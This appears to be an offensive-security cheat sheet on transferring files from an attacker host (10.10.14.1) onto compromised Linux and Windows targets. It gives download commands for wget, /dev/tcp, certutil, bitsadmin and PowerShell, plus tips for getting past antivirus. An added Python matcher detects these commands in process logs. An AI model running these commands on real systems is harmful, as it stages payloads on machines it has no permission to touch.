File Transfer


Move files between attacker and target. Pick the method that survives the network you are in.

LHOST=10.10.14.1

i. Serve from attacker

Python HTTP, no uploads:

python3 -m http.server 80

Python HTTP with upload support, accepts POST to /upload:

pip install uploadserver
python3 -m uploadserver 80

SMB share, useful for Windows targets that block HTTP egress:

impacket-smbserver share . -smb2support                                ## guest access
impacket-smbserver share . -smb2support -user u -password p            ## auth required

PHP HTTP, when python is missing:

php -S 0.0.0.0:80

WebDAV, drag-and-drop friendly from Windows Explorer:

wsgidav --port=8080 --root=. --auth=anonymous

ii. Pull on Linux target

wget http://$LHOST/file -O /tmp/file
curl http://$LHOST/file -o /tmp/file

No wget or curl, pure bash:

exec 3<>/dev/tcp/10.10.14.1/80
echo -e "GET /file HTTP/1.0\r\nHost: $LHOST\r\n\r\n" >&3
cat <&3 > /tmp/file        ## HTTP response headers are saved too; strip everything up to the first blank line
exec 3>&-

Over openssl when only HTTPS works:

echo -e "GET /file HTTP/1.0\r\nHost: $LHOST\r\n\r\n" | openssl s_client -quiet -connect $LHOST:443 2>/dev/null | sed '1,/^\r\{0,1\}$/d' > /tmp/file

Via Python when only python is on the box:

python3 -c "import urllib.request; urllib.request.urlretrieve('http://10.10.14.1/file','/tmp/file')"

iii. Pull on Windows target

PowerShell, the default:

(New-Object Net.WebClient).DownloadFile('http://10.10.14.1/f.exe','C:\Windows\Temp\f.exe')
iwr -uri http://10.10.14.1/f.exe -outfile C:\Windows\Temp\f.exe
Invoke-WebRequest http://10.10.14.1/f.exe -OutFile C:\Windows\Temp\f.exe

When PowerShell is blocked, certutil from cmd:

certutil -urlcache -split -f http://10.10.14.1/f.exe C:\Windows\Temp\f.exe

Via SMB, no HTTP needed:

copy \\10.10.14.1\share\f.exe C:\Windows\Temp\

bitsadmin, legacy but works:

bitsadmin /transfer job /download /priority high http://10.10.14.1/f.exe C:\Windows\Temp\f.exe

AV / Defender

certutil and bitsadmin are flagged by every modern AV. For real engagements use signed binaries and HTTPS, or pull through a tunnel from Pivoting.
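
The download commands in this section leave distinctive process command lines, which is what the note above is about. As an added example (not part of the original page), here is a small Python matcher for process-creation logs; the rule names, host names and sample events are constructed for illustration.

```python
import re

SW = r"[-/]"              # these Windows tools accept "-" or "/" before a switch
URL = r"https?://\S+"

RULES = [
    ("certutil-urlcache", re.compile(rf"\bcertutil(\.exe)?\b.*{SW}urlcache\b.*{URL}", re.I)),
    ("bitsadmin-transfer", re.compile(rf"\bbitsadmin(\.exe)?\b.*{SW}transfer\b.*{URL}", re.I)),
    ("ps-webclient", re.compile(r"net\.webclient\b.*\.downloadfile\s*\(", re.I)),
    ("ps-iwr-outfile", re.compile(r"\b(iwr|invoke-webrequest)\b.*-outfile\b", re.I)),
    ("copy-from-unc", re.compile(r"\bcopy\s+\\\\[\w.\-]+\\\S+", re.I)),
]

# Remote end of the transfer: host of an http(s) URL, or server of a UNC path.
REMOTE = re.compile(r"https?://([^/\s']+)|\\\\([\w.\-]+)\\", re.I)

# Constructed (host, command line) events: five transfers and three benign lookalikes.
EVENTS = [
    ("WS01", r"certutil -urlcache -split -f http://10.10.14.1/f.exe C:\Windows\Temp\f.exe"),
    ("WS01", r"certutil -hashfile C:\Windows\Temp\f.exe SHA256"),
    ("WS02", r"C:\Windows\System32\bitsadmin.exe /transfer job /download /priority high http://10.10.14.1/f.exe C:\Windows\Temp\f.exe"),
    ("WS02", r"bitsadmin /list /allusers"),
    ("WS03", r"powershell (New-Object Net.WebClient).DownloadFile('http://10.10.14.1/f.exe','C:\Windows\Temp\f.exe')"),
    ("WS03", r"powershell iwr -uri http://10.10.14.1/f.exe -outfile C:\Windows\Temp\f.exe"),
    ("WS04", r"cmd.exe /c copy \\10.10.14.1\share\f.exe C:\Windows\Temp\f.exe"),
    ("WS04", r"cmd.exe /c copy C:\a.txt D:\b.txt"),
]

def remote_host(cmdline):
    """Return the remote host named in the command line, or None."""
    m = REMOTE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None

def scan(events):
    """Return (host, rule, remote_host) for each command line matching a rule."""
    hits = []
    for host, cmdline in events:
        for name, rx in RULES:
            if rx.search(cmdline):
                hits.append((host, name, remote_host(cmdline)))
                break  # one alert per event is enough
    return hits

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

Feed it the command-line field from Sysmon event ID 1 or Security event 4688 (with command-line auditing enabled) in place of the constructed `EVENTS` list.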

iv. Cut and paste, no network at all

Small files survive any transport this way. Encode on attacker:

base64 -w0 < file

Paste into target shell:

echo BASE64HERE | base64 -d > /tmp/file

Heredoc for text files, no escaping nightmares:

cat > /tmp/file <<'EOF'
... paste content here ...
EOF